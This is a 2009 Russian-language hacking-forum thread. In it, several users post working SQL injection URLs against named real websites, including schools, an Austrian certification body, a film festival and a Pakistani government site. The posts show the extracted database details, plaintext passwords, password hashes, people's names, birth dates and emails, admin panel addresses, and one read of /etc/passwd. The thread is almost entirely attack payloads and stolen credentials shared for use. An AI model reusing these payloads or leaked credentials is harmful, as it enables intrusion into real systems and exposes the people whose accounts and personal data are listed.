ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7791  
Старый 13.02.2009, 09:51
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

options.bc.ca - PR4
Код:
http://www.options.bc.ca/program_info.php?cat_id=10&program_id=23000%27+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
DB_Ver : 4.1.22-standard
DB_User : options_db@localhost
DB : options_db1

cornerstoneacademy.bc.ca - PR4
Код:
http://www.cornerstoneacademy.bc.ca/certification.php?cat_id=7&cert_id=24+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10/*
DB_Ver : 5.0.27
DB_Ver : cornerstone@localhost
DB : cornerstone

Последний раз редактировалось Kraneg; 13.02.2009 в 10:09..
 
Ответить с цитированием

Blind
  #7792  
Старый 13.02.2009, 12:59
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию Blind

http://www.autotrafic.ro/vanzari/anunt1750+AND+ASCII(SUBSTRING((select+concat_ws(0x 3a,version(),user(),database()) ),4,1))=46-- /Vand_Porsche_924.html



Version: 5.0.51a-3ubuntu5.1
Database : autotraficv2
User : autotrafic@localhost




2 Jokester- sorry

Последний раз редактировалось Gorev; 13.02.2009 в 14:14..
 
Ответить с цитированием

  #7793  
Старый 13.02.2009, 15:09
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Еще один крупный проект -)

PageRank = 7


Цитата:
http://www.ocg.at/zertifikate/tc_suche_detail.php?id=1809809765440+union+select+ 1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68--

Цитата:
http://www.ecdl.at/service/tc_suche_detail.php?id=1609470970809+union+select+ 1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68--

Database Version: 5.0.45-log
Database name: ecdl
User name: ecdldb@ACA80012.ipt.aol.com


Пользователи


Цитата:
http://www.ocg.at/zertifikate/tc_suche_detail.php?id=1809809765440+UNION+SELECT+ 1,CONCAT(0x3a,(SELECT+CONCAT(username,0x3a,passwor d,0x3a,email)+FROM+ecdl.ecdl_person+LIMIT+0,1),0x3 a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60,61,62,63,64,65,66,67,68--
username : password : emai


: Manfred.Wolfslast.1959-08-12: web1206at : office@viennagroup.at
: Alexander.Kappel.1974-04-12: 19ilvy74 : a.kappel@bfi-burgenland.at
: Markus.Krojer.1980-10-20 : 474021 :
: Michael.Krojer.1974-05-13: nokia74 : michael@krojer.at
: KARL.SCHUH.1950-11-01 : 994868 :

И так пол лимона -)


Администраторы


Цитата:
http://www.ocg.at/zertifikate/tc_suche_detail.php?id=1809809765440+UNION+SELECT+ 1,CONCAT(0x3a,(SELECT+CONCAT(id,0x3a,username,0x3a ,password)+FROM+ecdl.ecdl_administrator+LIMIT+1,1) ,0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68--
id : username : password


:38: daniela : 08puesmk*
:3: resch : gcoldcexj901
:28: livia : barca123
:37: karin : kImqiTUc
:27: rupert : vanhalen1966
:26: Malgorzata : mis1919
:21: kilian : schwechat02
:24: manuela : chicco202
:23: angelika : 1812dominik
:20: lancelot : Stiegl
:19: andreas : alaemmer
 
Ответить с цитированием

  #7794  
Старый 13.02.2009, 16:56
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://www.ire x.md/viewdetale.php?id=-4+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--&lang=eng
4.1.22

http://www.hq class.md/company/index.php?f=-14796+union+select+1,2,3,4,table_name,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+information_schema.tables+limi t+83,1--&l=ru&ses=prodserv&viewps=5437
83 tablits

versia 5
 
Ответить с цитированием

  #7795  
Старый 13.02.2009, 17:14
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://www.phc.gov.pk/newsshow.php?id=99+union+select+1,2,3,concat_ws(0x 3a,user(),database(),version(),login,password),5,6 +from+sadmin--

phcdb@72.51.46.233hc:5.0.51a-community-log:2:0hcphc:23f043c45f949381613ba2dd167891b4

23f043c45f949381613ba2dd167891b4 = passhealth789

А админку не нашел((
 
Ответить с цитированием

  #7796  
Старый 13.02.2009, 17:35
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.agriminternational.com/acc.php?lang=1&id=-6%20union%20select%20concat_ws(0x3a,user,pass)%20f rom%20admin--

Админка

http://www.agriminternational.com/admin
Имя пасс Admin: admin
 
Ответить с цитированием

  #7797  
Старый 13.02.2009, 18:13
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Welcome to the Jameson Dublin International Film Festival
Код:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7/*
user(): IFFUSR@LOCALHOST
database(): DUBLINIFF_COM
version(): 5.0.27

PR=5
тИЦ=10

table test_admin:
Код:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0x3a,username,0x3a,password),4,5,6,7+from+test_admin/*
Код HTML:
1:ADMIN:ADMINPWD1
table mcc004_user:
Код:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0x3a,user_login,0x3a,user_pass),4,5,6,7+from+mcc004_wp_users/*
Код HTML:
1:ADMIN:$P$BWSEILDVQWFDR4VRWWLPQRYW3PCKEI.
2:ANDREW KENNEDY:$P$BXXUBZWP6V9NXGJFXCSR5F2RL5WRQG1
админка:
Код:
http://www.jdiff.com/admin/login.php


OSAS Stallion Auction
Код:
http://www.osasauction.com/item.php?id=-3+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
вывод в title

user(): peimatin_auct3@localhost
database(): peimatin_auct3
version(): 5.0.75-community-log

table PHPAUCTIONXL_adminusers:
Код HTML:
porchak:832d376cb74fb47ed113debe9b5f24d9
table PHPAUCTIONXL_users:
Код HTML:
1:jayport:bf6a89d3935ceb0ed798149d2ac967ed
2:auctionstaff:bf6a89d3935ceb0ed798149d2ac967ed
3:colt12:3e1f9e1da3b65fa102d3a6589bf409b6
4:Breeder:4160c64318079c955543d5a14ea3a27b
5:stefbo:bcea5fde6a21c943838b2d5a1784a2e4
6:chanthor:cda8b830510c5c1d0e55f8e147c374a7
7:jamesinc:c1a9eed41e121557ead9156201421d41
админка:
Код:
http://www.osasauction.com/admin/


Ocean City Golf - Golf Packages
Код:
http://www.ocgolf.com/packages/packagers.php?id=-13'+union+select+concat(user(),0x3a,database(),0x3a,version())/*
user(): golf@localhost
database(): golfdb
version(): 4.0.24-standard-log

PR=5
тИЦ=10

з.ы интересная sql inj
 
Ответить с цитированием

  #7798  
Старый 13.02.2009, 18:33
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.internationalfellowships.org.uk/host.php?host_id=-1%20union%20select%201,2,3,group_concat(table_name ),5,6,7,8,9%20from%20information_schema.tables--

5.0.67
 
Ответить с цитированием

  #7799  
Старый 13.02.2009, 18:39
Аватар для edichka
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572

Репутация: 34
По умолчанию

http://www.e-travel.ie

Код HTML:
http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a3b,version(),database(),user()),6,7,8,9,0,1

5.0.45-log:;etravelertyu:;etravelusr@localhost


Пассы лимитом

http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a,Admin_Name,Admin_Pass),6,7,8,9,0,1+from+Administrators+limit+0,1

Audrey:rUkhf.0RR7tNk

хэш доселе невиданый =)

Логинка

http://www.e-travel.ie/cruise_club_login.php
 
Ответить с цитированием

  #7800  
Старый 13.02.2009, 19:07
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9, 10,11+LIMIT+1,1--


Database Version: 5.0.26
Database name: rugby_ro2
User name: root@localhost




читаем

http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,LOAD_F ILE(0x2F6574632F706173737764),4,5,6,7,8,9,10,11+LI MIT+1,1--



в скуле выводятся бд всех сайтов на хостинге

Последний раз редактировалось Gorev; 13.02.2009 в 19:10..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ